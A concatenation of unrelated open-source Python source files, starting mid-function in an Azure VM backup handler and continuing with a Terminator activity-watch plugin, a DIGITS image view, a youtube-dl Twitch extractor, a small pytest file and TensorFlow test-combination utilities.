run_result = CommonVariables.success
run_status = 'success'
error_msg = 'Enable Succeeded'
backup_logger.log(error_msg)
else:
run_status = 'error'
run_result = CommonVariables.error_parameter
error_msg = 'command is not correct'
backup_logger.log(error_msg, False, 'Error')
except Exception as e:
errMsg = 'Failed to enable the extension with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(errMsg, False, 'Error')
global_error_result = e
finally:
backup_logger.log('doing unfreeze now...')
if(freeze_called):
unfreeze_result = freezer.unfreezeall()
backup_logger.log('unfreeze result ' + str(unfreeze_result))
if(unfreeze_result is not None and len(unfreeze_result.errors) > 0):
error_msg += ('Enable Succeeded with error: ' + str(unfreeze_result.errors))
backup_logger.log(error_msg, False, 'Warning')
backup_logger.log('unfreeze ends...')
if(para_parser is not None and para_parser.logsBlobUri is not None):
backup_logger.commit(para_parser.logsBlobUri)
else:
backup_logger.log("the logs blob uri is not there, so do not upload log.");
backup_logger.commit_to_local()
"""
        we do the final report here to avoid the complex logic of handling logging while the file system is frozen.
"""
if(global_error_result is not None):
if(hasattr(global_error_result,'errno') and global_error_result.errno == 2):
run_result = CommonVariables.error_12
elif(para_parser is None):
run_result = CommonVariables.error_parameter
else:
run_result = CommonVariables.error
run_status = 'error'
error_msg += ('Enable failed.' + str(global_error_result))
if(para_parser is not None and para_parser.statusBlobUri is not None):
do_backup_status_report(operation='Enable',status = run_status,\
status_code=str(run_result), \
message=error_msg,\
taskId=para_parser.taskId,\
commandStartTimeUTCTicks=para_parser.commandStartTimeUTCTicks,\
blobUri=para_parser.statusBlobUri)
hutil.do_exit(0, 'Enable', run_status, str(run_result), error_msg)
def uninstall():
hutil.do_parse_context('Uninstall')
hutil.do_exit(0,'Uninstall','success','0', 'Uninstall succeeded')
def disable():
hutil.do_parse_context('Disable')
hutil.do_exit(0,'Disable','success','0', 'Disable Succeeded')
def update():
    hutil.do_parse_context('Update')
hutil.do_exit(0,'Update','success','0', 'Update Succeeded')
if __name__ == '__main__' :
main()
| v-zhongz/azure-linux-extensions | VMBackup/main/handle.py | Python | apache-2.0 | 12,248 |
#!/usr/bin/python
# Terminator by Chris Jones <[email protected]>
# GPL v2 only
"""activitywatch.py - Terminator Plugin to watch a terminal for activity"""
import time
import gtk
import gobject
import terminatorlib.plugin as plugin
from terminatorlib.translation import _
from terminatorlib.util import err, dbg
from terminatorlib.version import APP_NAME
try:
import pynotify
# Every plugin you want Terminator to load *must* be listed in 'AVAILABLE'
# This is inside this try so we only make the plugin available if pynotify
# is present on this computer.
AVAILABLE = ['ActivityWatch', 'InactivityWatch']
except ImportError:
err(_('ActivityWatch plugin unavailable: please install python-notify'))
class ActivityWatch(plugin.MenuItem):
"""Add custom commands to the terminal menu"""
capabilities = ['terminal_menu']
watches = None
last_notifies = None
timers = None
def __init__(self):
plugin.MenuItem.__init__(self)
if not self.watches:
self.watches = {}
if not self.last_notifies:
self.last_notifies = {}
if not self.timers:
self.timers = {}
pynotify.init(APP_NAME.capitalize())
def callback(self, menuitems, menu, terminal):
"""Add our menu items to the menu"""
if not self.watches.has_key(terminal):
item = gtk.MenuItem(_('Watch for activity'))
item.connect("activate", self.watch, terminal)
else:
item = gtk.MenuItem(_('Stop watching for activity'))
item.connect("activate", self.unwatch, terminal)
menuitems.append(item)
def watch(self, _widget, terminal):
"""Watch a terminal"""
vte = terminal.get_vte()
self.watches[terminal] = vte.connect('contents-changed',
self.notify, terminal)
def unwatch(self, _widget, terminal):
"""Stop watching a terminal"""
vte = terminal.get_vte()
vte.disconnect(self.watches[terminal])
del(self.watches[terminal])
def notify(self, _vte, terminal):
"""Notify that a terminal did something"""
show_notify = False
# Don't notify if the user is already looking at this terminal.
if terminal.vte.flags() & gtk.HAS_FOCUS:
return True
note = pynotify.Notification('Terminator', 'Activity in: %s' %
terminal.get_window_title(), 'terminator')
this_time = time.mktime(time.gmtime())
if not self.last_notifies.has_key(terminal):
show_notify = True
else:
last_time = self.last_notifies[terminal]
if this_time - last_time > 10:
show_notify = True
if show_notify == True:
note.show()
self.last_notifies[terminal] = this_time
return True
class InactivityWatch(plugin.MenuItem):
"""Add custom commands to notify when a terminal goes inactive"""
capabilities = ['terminal_menu']
watches = None
last_activities = None
timers = None
def __init__(self):
plugin.MenuItem.__init__(self)
if not self.watches:
self.watches = {}
if not self.last_activities:
self.last_activities = {}
if not self.timers:
self.timers = {}
pynotify.init(APP_NAME.capitalize())
def callback(self, menuitems, menu, terminal):
"""Add our menu items to the menu"""
if not self.watches.has_key(terminal):
item = gtk.MenuItem(_("Watch for silence"))
item.connect("activate", self.watch, terminal)
else:
item = gtk.MenuItem(_("Stop watching for silence"))
item.connect("activate", self.unwatch, terminal)
menuitems.append(item)
dbg('Menu items appended')
def watch(self, _widget, terminal):
"""Watch a terminal"""
vte = terminal.get_vte()
self.watches[terminal] = vte.connect('contents-changed',
self.reset_timer, terminal)
timeout_id = gobject.timeout_add(5000, self.check_times, terminal)
self.timers[terminal] = timeout_id
dbg('timer %s added for %s' %(timeout_id, terminal))
def unwatch(self, _vte, terminal):
"""Unwatch a terminal"""
vte = terminal.get_vte()
vte.disconnect(self.watches[terminal])
del(self.watches[terminal])
gobject.source_remove(self.timers[terminal])
del(self.timers[terminal])
def reset_timer(self, _vte, terminal):
"""Reset the last-changed time for a terminal"""
time_now = time.mktime(time.gmtime())
self.last_activities[terminal] = time_now
dbg('reset activity time for %s' % terminal)
def check_times(self, terminal):
"""Check if this terminal has gone silent"""
time_now = time.mktime(time.gmtime())
if not self.last_activities.has_key(terminal):
dbg('Terminal %s has no last activity' % terminal)
return True
dbg('seconds since last activity: %f (%s)' % (time_now - self.last_activities[terminal], terminal))
if time_now - self.last_activities[terminal] >= 10.0:
del(self.last_activities[terminal])
note = pynotify.Notification('Terminator', 'Silence in: %s' %
terminal.get_window_title(), 'terminator')
note.show()
return True
| zygh0st/terminator | terminatorlib/plugins/activitywatch.py | Python | gpl-2.0 | 5,529 |
# Copyright (c) 2014-2015, NVIDIA CORPORATION. All rights reserved.
import os.path
from cStringIO import StringIO
import flask
import PIL.Image
import digits
from digits import utils
from digits.webapp import app, autodoc
import classification.views
import extraction.views
NAMESPACE = '/datasets/images'
@app.route(NAMESPACE + '/resize-example', methods=['POST'])
@autodoc('datasets')
def image_dataset_resize_example():
"""
Resizes the example image, and returns it as a string of png data
"""
try:
example_image_path = os.path.join(os.path.dirname(digits.__file__), 'static', 'images', 'mona_lisa.jpg')
image = utils.image.load_image(example_image_path)
width = int(flask.request.form['width'])
height = int(flask.request.form['height'])
channels = int(flask.request.form['channels'])
resize_mode = flask.request.form['resize_mode']
encoding = flask.request.form['encoding']
image = utils.image.resize_image(image, height, width,
channels=channels,
resize_mode=resize_mode,
)
if encoding == 'none':
length = len(image.tostring())
else:
s = StringIO()
if encoding == 'png':
PIL.Image.fromarray(image).save(s, format='PNG')
elif encoding == 'jpg':
PIL.Image.fromarray(image).save(s, format='JPEG', quality=90)
else:
raise ValueError('unrecognized encoding "%s"' % encoding)
s.seek(0)
image = PIL.Image.open(s)
length = len(s.getvalue())
data = utils.image.embed_image_html(image)
        return '<img src=\"' + data + '\" style=\"width:%spx;height:%spx\" />\n<br>\n<i>Image size: %s</i>' % (
width,
height,
utils.sizeof_fmt(length)
)
except Exception as e:
return '%s: %s' % (type(e).__name__, e)
| DESHRAJ/DIGITS | digits/dataset/images/views.py | Python | bsd-3-clause | 1,982 |
# coding: utf-8
from __future__ import unicode_literals
import itertools
import re
import random
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_urllib_parse,
compat_urllib_request,
)
from ..utils import (
ExtractorError,
parse_iso8601,
)
class TwitchBaseIE(InfoExtractor):
_VALID_URL_BASE = r'https?://(?:www\.)?twitch\.tv'
_API_BASE = 'https://api.twitch.tv'
_USHER_BASE = 'http://usher.twitch.tv'
_LOGIN_URL = 'https://secure.twitch.tv/login'
_LOGIN_POST_URL = 'https://passport.twitch.tv/authorize'
_NETRC_MACHINE = 'twitch'
def _handle_error(self, response):
if not isinstance(response, dict):
return
error = response.get('error')
if error:
raise ExtractorError(
'%s returned error: %s - %s' % (self.IE_NAME, error, response.get('message')),
expected=True)
def _download_json(self, url, video_id, note='Downloading JSON metadata'):
headers = {
'Referer': 'http://api.twitch.tv/crossdomain/receiver.html?v=2',
'X-Requested-With': 'XMLHttpRequest',
}
for cookie in self._downloader.cookiejar:
if cookie.name == 'api_token':
headers['Twitch-Api-Token'] = cookie.value
request = compat_urllib_request.Request(url, headers=headers)
response = super(TwitchBaseIE, self)._download_json(request, video_id, note)
self._handle_error(response)
return response
def _real_initialize(self):
self._login()
def _login(self):
(username, password) = self._get_login_info()
if username is None:
return
login_page = self._download_webpage(
self._LOGIN_URL, None, 'Downloading login page')
login_form = self._hidden_inputs(login_page)
login_form.update({
'login': username.encode('utf-8'),
'password': password.encode('utf-8'),
})
request = compat_urllib_request.Request(
self._LOGIN_POST_URL, compat_urllib_parse.urlencode(login_form).encode('utf-8'))
request.add_header('Referer', self._LOGIN_URL)
response = self._download_webpage(
request, None, 'Logging in as %s' % username)
error_message = self._search_regex(
r'<div[^>]+class="subwindow_notice"[^>]*>([^<]+)</div>',
response, 'error message', default=None)
if error_message:
raise ExtractorError(
'Unable to login. Twitch said: %s' % error_message, expected=True)
if '>Reset your password<' in response:
self.report_warning('Twitch asks you to reset your password, go to https://secure.twitch.tv/reset/submit')
def _prefer_source(self, formats):
try:
source = next(f for f in formats if f['format_id'] == 'Source')
source['preference'] = 10
except StopIteration:
pass # No Source stream present
self._sort_formats(formats)
class TwitchItemBaseIE(TwitchBaseIE):
def _download_info(self, item, item_id):
return self._extract_info(self._download_json(
'%s/kraken/videos/%s%s' % (self._API_BASE, item, item_id), item_id,
'Downloading %s info JSON' % self._ITEM_TYPE))
def _extract_media(self, item_id):
info = self._download_info(self._ITEM_SHORTCUT, item_id)
response = self._download_json(
'%s/api/videos/%s%s' % (self._API_BASE, self._ITEM_SHORTCUT, item_id), item_id,
'Downloading %s playlist JSON' % self._ITEM_TYPE)
entries = []
chunks = response['chunks']
qualities = list(chunks.keys())
for num, fragment in enumerate(zip(*chunks.values()), start=1):
formats = []
for fmt_num, fragment_fmt in enumerate(fragment):
format_id = qualities[fmt_num]
fmt = {
'url': fragment_fmt['url'],
'format_id': format_id,
'quality': 1 if format_id == 'live' else 0,
}
m = re.search(r'^(?P<height>\d+)[Pp]', format_id)
if m:
fmt['height'] = int(m.group('height'))
formats.append(fmt)
self._sort_formats(formats)
entry = dict(info)
entry['id'] = '%s_%d' % (entry['id'], num)
entry['title'] = '%s part %d' % (entry['title'], num)
entry['formats'] = formats
entries.append(entry)
return self.playlist_result(entries, info['id'], info['title'])
def _extract_info(self, info):
return {
'id': info['_id'],
'title': info['title'],
'description': info['description'],
'duration': info['length'],
'thumbnail': info['preview'],
'uploader': info['channel']['display_name'],
'uploader_id': info['channel']['name'],
'timestamp': parse_iso8601(info['recorded_at']),
'view_count': info['views'],
}
def _real_extract(self, url):
return self._extract_media(self._match_id(url))
class TwitchVideoIE(TwitchItemBaseIE):
IE_NAME = 'twitch:video'
_VALID_URL = r'%s/[^/]+/b/(?P<id>\d+)' % TwitchBaseIE._VALID_URL_BASE
_ITEM_TYPE = 'video'
_ITEM_SHORTCUT = 'a'
_TEST = {
'url': 'http://www.twitch.tv/riotgames/b/577357806',
'info_dict': {
'id': 'a577357806',
'title': 'Worlds Semifinals - Star Horn Royal Club vs. OMG',
},
'playlist_mincount': 12,
}
class TwitchChapterIE(TwitchItemBaseIE):
IE_NAME = 'twitch:chapter'
_VALID_URL = r'%s/[^/]+/c/(?P<id>\d+)' % TwitchBaseIE._VALID_URL_BASE
_ITEM_TYPE = 'chapter'
_ITEM_SHORTCUT = 'c'
_TESTS = [{
'url': 'http://www.twitch.tv/acracingleague/c/5285812',
'info_dict': {
'id': 'c5285812',
'title': 'ACRL Off Season - Sports Cars @ Nordschleife',
},
'playlist_mincount': 3,
}, {
'url': 'http://www.twitch.tv/tsm_theoddone/c/2349361',
'only_matching': True,
}]
class TwitchVodIE(TwitchItemBaseIE):
IE_NAME = 'twitch:vod'
_VALID_URL = r'%s/[^/]+/v/(?P<id>\d+)' % TwitchBaseIE._VALID_URL_BASE
_ITEM_TYPE = 'vod'
_ITEM_SHORTCUT = 'v'
_TEST = {
'url': 'http://www.twitch.tv/riotgames/v/6528877',
'info_dict': {
'id': 'v6528877',
'ext': 'mp4',
'title': 'LCK Summer Split - Week 6 Day 1',
'thumbnail': 're:^https?://.*\.jpg$',
'duration': 17208,
'timestamp': 1435131709,
'upload_date': '20150624',
'uploader': 'Riot Games',
'uploader_id': 'riotgames',
'view_count': int,
},
'params': {
# m3u8 download
'skip_download': True,
},
}
def _real_extract(self, url):
item_id = self._match_id(url)
info = self._download_info(self._ITEM_SHORTCUT, item_id)
access_token = self._download_json(
'%s/api/vods/%s/access_token' % (self._API_BASE, item_id), item_id,
'Downloading %s access token' % self._ITEM_TYPE)
formats = self._extract_m3u8_formats(
'%s/vod/%s?nauth=%s&nauthsig=%s&allow_source=true'
% (self._USHER_BASE, item_id, access_token['token'], access_token['sig']),
item_id, 'mp4')
self._prefer_source(formats)
info['formats'] = formats
return info
class TwitchPlaylistBaseIE(TwitchBaseIE):
_PLAYLIST_URL = '%s/kraken/channels/%%s/videos/?offset=%%d&limit=%%d' % TwitchBaseIE._API_BASE
_PAGE_LIMIT = 100
def _extract_playlist(self, channel_id):
info = self._download_json(
'%s/kraken/channels/%s' % (self._API_BASE, channel_id),
channel_id, 'Downloading channel info JSON')
channel_name = info.get('display_name') or info.get('name')
entries = []
offset = 0
limit = self._PAGE_LIMIT
for counter in itertools.count(1):
response = self._download_json(
self._PLAYLIST_URL % (channel_id, offset, limit),
channel_id, 'Downloading %s videos JSON page %d' % (self._PLAYLIST_TYPE, counter))
page_entries = self._extract_playlist_page(response)
if not page_entries:
break
entries.extend(page_entries)
offset += limit
return self.playlist_result(
[self.url_result(entry) for entry in set(entries)],
channel_id, channel_name)
def _extract_playlist_page(self, response):
videos = response.get('videos')
return [video['url'] for video in videos] if videos else []
def _real_extract(self, url):
return self._extract_playlist(self._match_id(url))
class TwitchProfileIE(TwitchPlaylistBaseIE):
IE_NAME = 'twitch:profile'
_VALID_URL = r'%s/(?P<id>[^/]+)/profile/?(?:\#.*)?$' % TwitchBaseIE._VALID_URL_BASE
_PLAYLIST_TYPE = 'profile'
_TEST = {
'url': 'http://www.twitch.tv/vanillatv/profile',
'info_dict': {
'id': 'vanillatv',
'title': 'VanillaTV',
},
'playlist_mincount': 412,
}
class TwitchPastBroadcastsIE(TwitchPlaylistBaseIE):
IE_NAME = 'twitch:past_broadcasts'
_VALID_URL = r'%s/(?P<id>[^/]+)/profile/past_broadcasts/?(?:\#.*)?$' % TwitchBaseIE._VALID_URL_BASE
_PLAYLIST_URL = TwitchPlaylistBaseIE._PLAYLIST_URL + '&broadcasts=true'
_PLAYLIST_TYPE = 'past broadcasts'
_TEST = {
'url': 'http://www.twitch.tv/spamfish/profile/past_broadcasts',
'info_dict': {
'id': 'spamfish',
'title': 'Spamfish',
},
'playlist_mincount': 54,
}
class TwitchBookmarksIE(TwitchPlaylistBaseIE):
IE_NAME = 'twitch:bookmarks'
_VALID_URL = r'%s/(?P<id>[^/]+)/profile/bookmarks/?(?:\#.*)?$' % TwitchBaseIE._VALID_URL_BASE
_PLAYLIST_URL = '%s/api/bookmark/?user=%%s&offset=%%d&limit=%%d' % TwitchBaseIE._API_BASE
_PLAYLIST_TYPE = 'bookmarks'
_TEST = {
'url': 'http://www.twitch.tv/ognos/profile/bookmarks',
'info_dict': {
'id': 'ognos',
'title': 'Ognos',
},
'playlist_mincount': 3,
}
def _extract_playlist_page(self, response):
entries = []
for bookmark in response.get('bookmarks', []):
video = bookmark.get('video')
if not video:
continue
entries.append(video['url'])
return entries
class TwitchStreamIE(TwitchBaseIE):
IE_NAME = 'twitch:stream'
_VALID_URL = r'%s/(?P<id>[^/#?]+)/?(?:\#.*)?$' % TwitchBaseIE._VALID_URL_BASE
_TESTS = [{
'url': 'http://www.twitch.tv/shroomztv',
'info_dict': {
'id': '12772022048',
'display_id': 'shroomztv',
'ext': 'mp4',
'title': 're:^ShroomzTV [0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}$',
'description': 'H1Z1 - lonewolfing with ShroomzTV | A3 Battle Royale later - @ShroomzTV',
'is_live': True,
'timestamp': 1421928037,
'upload_date': '20150122',
'uploader': 'ShroomzTV',
'uploader_id': 'shroomztv',
'view_count': int,
},
'params': {
# m3u8 download
'skip_download': True,
},
}, {
'url': 'http://www.twitch.tv/miracle_doto#profile-0',
'only_matching': True,
}]
def _real_extract(self, url):
channel_id = self._match_id(url)
stream = self._download_json(
'%s/kraken/streams/%s' % (self._API_BASE, channel_id), channel_id,
'Downloading stream JSON').get('stream')
# Fallback on profile extraction if stream is offline
if not stream:
return self.url_result(
'http://www.twitch.tv/%s/profile' % channel_id,
'TwitchProfile', channel_id)
# Channel name may be typed if different case than the original channel name
# (e.g. http://www.twitch.tv/TWITCHPLAYSPOKEMON) that will lead to constructing
# an invalid m3u8 URL. Working around by use of original channel name from stream
# JSON and fallback to lowercase if it's not available.
channel_id = stream.get('channel', {}).get('name') or channel_id.lower()
access_token = self._download_json(
'%s/api/channels/%s/access_token' % (self._API_BASE, channel_id), channel_id,
'Downloading channel access token')
query = {
'allow_source': 'true',
'p': random.randint(1000000, 10000000),
'player': 'twitchweb',
'segment_preference': '4',
'sig': access_token['sig'].encode('utf-8'),
'token': access_token['token'].encode('utf-8'),
}
formats = self._extract_m3u8_formats(
'%s/api/channel/hls/%s.m3u8?%s'
% (self._USHER_BASE, channel_id, compat_urllib_parse.urlencode(query)),
channel_id, 'mp4')
self._prefer_source(formats)
view_count = stream.get('viewers')
timestamp = parse_iso8601(stream.get('created_at'))
channel = stream['channel']
title = self._live_title(channel.get('display_name') or channel.get('name'))
description = channel.get('status')
thumbnails = []
for thumbnail_key, thumbnail_url in stream['preview'].items():
m = re.search(r'(?P<width>\d+)x(?P<height>\d+)\.jpg$', thumbnail_key)
if not m:
continue
thumbnails.append({
'url': thumbnail_url,
'width': int(m.group('width')),
'height': int(m.group('height')),
})
return {
'id': compat_str(stream['_id']),
'display_id': channel_id,
'title': title,
'description': description,
'thumbnails': thumbnails,
'uploader': channel.get('display_name'),
'uploader_id': channel.get('name'),
'timestamp': timestamp,
'view_count': view_count,
'formats': formats,
'is_live': True,
}
| DucQuang1/youtube-dl | youtube_dl/extractor/twitch.py | Python | unlicense | 14,422 |
from mypkg.power import power
class TestZero:
def test_ten(self):
assert power(0, 10, 1000) == 0
def test_hundred(self):
assert power(0, 100, 1000) == 0
| vogonsoft/pytest-tutorial | test05/test_zero.py | Python | unlicense | 163 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Facilities for creating multiple test combinations.
Here is an example of testing various optimizers in Eager and Graph mode:
class AdditionExample(test.TestCase, parameterized.TestCase):
@combinations.generate(
combinations.combine(mode=["graph", "eager"],
optimizer=[AdamOptimizer(),
GradientDescentOptimizer()]))
def testOptimizer(self, optimizer):
... f(optimizer)...
This will run `testOptimizer` 4 times with the specified optimizers: 2 in
Eager and 2 in Graph mode.
The test will be provided with arguments that match the arguments of combine
by name. It is necessary to request all arguments, except for `mode`, which is
optional.
`combine()` function is available for creating a cross product of various
options. `times()` function exists for creating a product of N `combine()`-ed
results. See below.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import OrderedDict
import sys
import types
import unittest
from absl.testing import parameterized
import six
from tensorflow.contrib.cluster_resolver import TPUClusterResolver
from tensorflow.contrib.distribute.python import mirrored_strategy as mirrored_lib
from tensorflow.contrib.distribute.python import one_device_strategy as one_device_lib
from tensorflow.contrib.distribute.python import tpu_strategy as tpu_lib
from tensorflow.contrib.optimizer_v2 import adagrad as adagrad_v2
from tensorflow.contrib.optimizer_v2 import adam as adam_v2
from tensorflow.contrib.optimizer_v2 import gradient_descent as gradient_descent_v2
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.training import adagrad
from tensorflow.python.training import adam
from tensorflow.python.training import distribution_strategy_context
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import rmsprop
from tensorflow.python.util import tf_inspect
GPU_TEST = "test_gpu" in sys.argv[0]
TPU_TEST = "test_tpu" in sys.argv[0]
def generate(combinations):
"""A decorator for generating test cases of a test method or a test class.
Args:
combinations: a list of dictionaries created using combine() and times().
Restrictions:
-- the "mode" argument can be either "eager" or "graph". It's "graph" by
default.
-- arguments of the test method must match by name to get the corresponding
value of the combination. Tests must accept all arguments except the
"mode", "required_tpu" and "required_gpus".
-- "distribution" argument is special and optional. It is meant for passing
instances of DistributionStrategy. Each instance is to be passed as via
`NamedDistribution`. If using "distribution", "required_gpus" and
"required_tpu" should be specified via the NamedDistribution instance,
rather than as separate arguments.
-- "required_tpu" argument is special and optional. If not `None`, then the
test will be skipped if TPUs aren't available.
-- "required_gpus" argument is special and optional. If not `None`, then the
test will be skipped if the specified number of GPUs aren't available.
Returns:
a decorator that will cause the test method or the test class to be run
under the specified conditions.
Raises:
ValueError - if "mode" argument wasn't either "eager" or "graph" or if other
arguments were not accepted by the test method.
"""
def decorator(test_method_or_class):
"""The decorator to be returned."""
# Generate good test names that can be used with --test_filter.
named_combinations = []
for combination in combinations:
# We use OrderedDicts in `combine()` and `times()` to ensure stable
# order of keys in each dictionary.
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format(
"".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) + [("testcase_name",
"_test{}".format(name))]))
if isinstance(test_method_or_class, type):
class_object = test_method_or_class
class_object._test_method_ids = test_method_ids = {}
for name, test_method in six.iteritems(class_object.__dict__.copy()):
if (name.startswith(unittest.TestLoader.testMethodPrefix) and
isinstance(test_method, types.FunctionType)):
delattr(class_object, name)
methods = {}
parameterized._update_class_dict_for_param_test_case(
class_object.__name__, methods, test_method_ids, name,
parameterized._ParameterizedTestIter(
_augment_with_special_arguments(test_method),
named_combinations, parameterized._NAMED, name))
for method_name, method in six.iteritems(methods):
setattr(class_object, method_name, method)
return class_object
else:
test_method = _augment_with_special_arguments(test_method_or_class)
return parameterized.named_parameters(*named_combinations)(test_method)
return decorator
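# --- Illustrative sketch (not part of the original module) ---
# How the restrictions above look in practice for a distribution-aware test;
# the class name and test body are hypothetical.
#
#   class _ExampleTest(test.TestCase, parameterized.TestCase):
#
#     @generate(combine(mode=["graph"],
#                       distribution=[one_device_strategy],
#                       use_bias=[True, False]))
#     def testBuild(self, distribution, use_bias):
#       with distribution.scope():
#         ...  # build and check the model; `mode` itself need not be accepted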
def _augment_with_special_arguments(test_method):
def decorated(self, **kwargs):
"""A wrapped test method that treats some arguments in a special way."""
mode = kwargs.pop("mode", "graph")
distribution = kwargs.get("distribution", None)
required_tpu = kwargs.pop("required_tpu", False)
required_gpus = kwargs.pop("required_gpus", None)
if distribution:
assert required_gpus is None, (
"Do not use `required_gpus` and `distribution` together.")
assert required_tpu is False, (
"Do not use `required_tpu` and `distribution` together.")
required_gpus = distribution.required_gpus
required_tpu = distribution.required_tpu
if required_tpu and not TPU_TEST:
self.skipTest("Test requires a TPU, but it's not available.")
if not required_tpu and TPU_TEST:
self.skipTest("Test that doesn't require a TPU.")
if not required_gpus:
if GPU_TEST:
self.skipTest("Test that doesn't require GPUs.")
elif context.num_gpus() < required_gpus:
self.skipTest(
"{} GPUs are not available for this test. {} GPUs are available".
format(required_gpus, context.num_gpus()))
# At this point, `kwargs` doesn't have `required_gpus` or `required_tpu`
# that the user might have specified. `kwargs` still has `mode`, which
# the test is allowed to accept or ignore.
requested_arguments = tf_inspect.getfullargspec(test_method).args
missing_arguments = set(list(kwargs.keys()) + ["self"]).difference(
set(requested_arguments + ["mode"]))
if missing_arguments:
raise ValueError("The test is missing arguments {} .".format(
missing_arguments))
kwargs_to_pass = {}
for arg in requested_arguments:
if arg == "self":
kwargs_to_pass[arg] = self
else:
kwargs_to_pass[arg] = kwargs[arg]
if mode == "eager":
with ops.Graph().as_default(), context.eager_mode():
if distribution:
kwargs_to_pass["distribution"] = distribution.strategy
test_method(**kwargs_to_pass)
elif mode == "graph":
with ops.Graph().as_default(), context.graph_mode():
if distribution:
kwargs_to_pass["distribution"] = distribution.strategy
test_method(**kwargs_to_pass)
else:
raise ValueError(
"'mode' has to be either 'eager' or 'graph' and not {}".format(
mode))
return decorated
def combine(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = combine(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
return [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
def times(*combined):
"""Generate a product of N sets of combinations.
times(combine(a=[1,2]), combine(b=[3,4])) == combine(a=[1,2], b=[3,4])
Args:
*combined: N lists of dictionaries that specify combinations.
Returns:
a list of dictionaries for each combination.
Raises:
ValueError: if some of the inputs have overlapping keys.
"""
assert combined
if len(combined) == 1:
return combined[0]
first = combined[0]
rest_combined = times(*combined[1:])
combined_results = []
for a in first:
for b in rest_combined:
if set(a.keys()).intersection(set(b.keys())):
raise ValueError("Keys need to not overlap: {} vs {}".format(
a.keys(), b.keys()))
combined_results.append(OrderedDict(list(a.items()) + list(b.items())))
return combined_results
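# --- Illustrative sketch (not part of the original module) ---
# Shows the shape of the dictionaries produced by `combine` and `times`.
def _example_combine_and_times():
  product = times(
      combine(mode=["graph", "eager"]), combine(use_bias=[True, False]))
  # `product` holds 4 OrderedDicts, e.g.
  # OrderedDict([("mode", "graph"), ("use_bias", True)]), and is equivalent to
  # combine(mode=["graph", "eager"], use_bias=[True, False]).
  return product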
class NamedObject(object):
"""A class that translates an object into a good test name."""
def __init__(self, name, obj):
self._name = name
self._obj = obj
def __getattr__(self, name):
return getattr(self._obj, name)
def __call__(self, *args, **kwargs):
return self._obj(*args, **kwargs)
def __repr__(self):
return self._name
class NamedDistribution(object):
"""Translates DistributionStrategy and its data into a good name."""
def __init__(self, name, distribution_fn, required_gpus=None,
required_tpu=False):
self._distribution_fn = distribution_fn
self._name = name
self._required_gpus = required_gpus
self._required_tpu = required_tpu
def __repr__(self):
return self._name
@property
def strategy(self):
return self._distribution_fn()
@property
def required_gpus(self):
return self._required_gpus
@property
def required_tpu(self):
return self._required_tpu
# pylint: disable=g-long-lambda
default_strategy = NamedDistribution(
"Default",
distribution_strategy_context._get_default_distribution_strategy, # pylint: disable=protected-access
required_gpus=None)
one_device_strategy = NamedDistribution(
"OneDeviceCPU", lambda: one_device_lib.OneDeviceStrategy("/cpu:0"),
required_gpus=None)
tpu_strategy = NamedDistribution(
"TPU", lambda: tpu_lib.TPUStrategy(
TPUClusterResolver(""), steps_per_run=2),
required_tpu=True)
tpu_strategy_one_step = NamedDistribution(
"TPUOneStep", lambda: tpu_lib.TPUStrategy(
TPUClusterResolver(""), steps_per_run=1),
required_tpu=True)
mirrored_strategy_with_gpu_and_cpu = NamedDistribution(
"MirroredCPUAndGPU",
lambda: mirrored_lib.MirroredStrategy(["/gpu:0", "/cpu:0"]),
required_gpus=1)
mirrored_strategy_with_two_gpus = NamedDistribution(
"Mirrored2GPUs",
lambda: mirrored_lib.MirroredStrategy(["/gpu:0", "/gpu:1"]),
required_gpus=2)
core_mirrored_strategy_with_gpu_and_cpu = NamedDistribution(
"CoreMirroredCPUAndGPU",
lambda: mirrored_lib.CoreMirroredStrategy(["/gpu:0", "/cpu:0"]),
required_gpus=1)
core_mirrored_strategy_with_two_gpus = NamedDistribution(
"CoreMirrored2GPUs",
lambda: mirrored_lib.CoreMirroredStrategy(["/gpu:0", "/gpu:1"]),
required_gpus=2)
gradient_descent_optimizer_v1_fn = NamedObject(
"GradientDescentV1", lambda: gradient_descent.GradientDescentOptimizer(0.2))
adagrad_optimizer_v1_fn = NamedObject(
"AdagradV1", lambda: adagrad.AdagradOptimizer(0.001))
adam_optimizer_v1_fn = NamedObject("AdamV1",
lambda: adam.AdamOptimizer(0.001, epsilon=1))
rmsprop_optimizer_v1_fn = NamedObject(
"RmsPropV1", lambda: rmsprop.RMSPropOptimizer(0.001))
optimizers_v1 = [gradient_descent_optimizer_v1_fn, adagrad_optimizer_v1_fn]
gradient_descent_optimizer_v2_fn = NamedObject(
"GradientDescentV2",
lambda: gradient_descent_v2.GradientDescentOptimizer(0.2))
adagrad_optimizer_v2_fn = NamedObject(
"AdagradV2", lambda: adagrad_v2.AdagradOptimizer(0.001))
adam_optimizer_v2_fn = NamedObject(
"AdamV2", lambda: adam_v2.AdamOptimizer(0.001, epsilon=1))
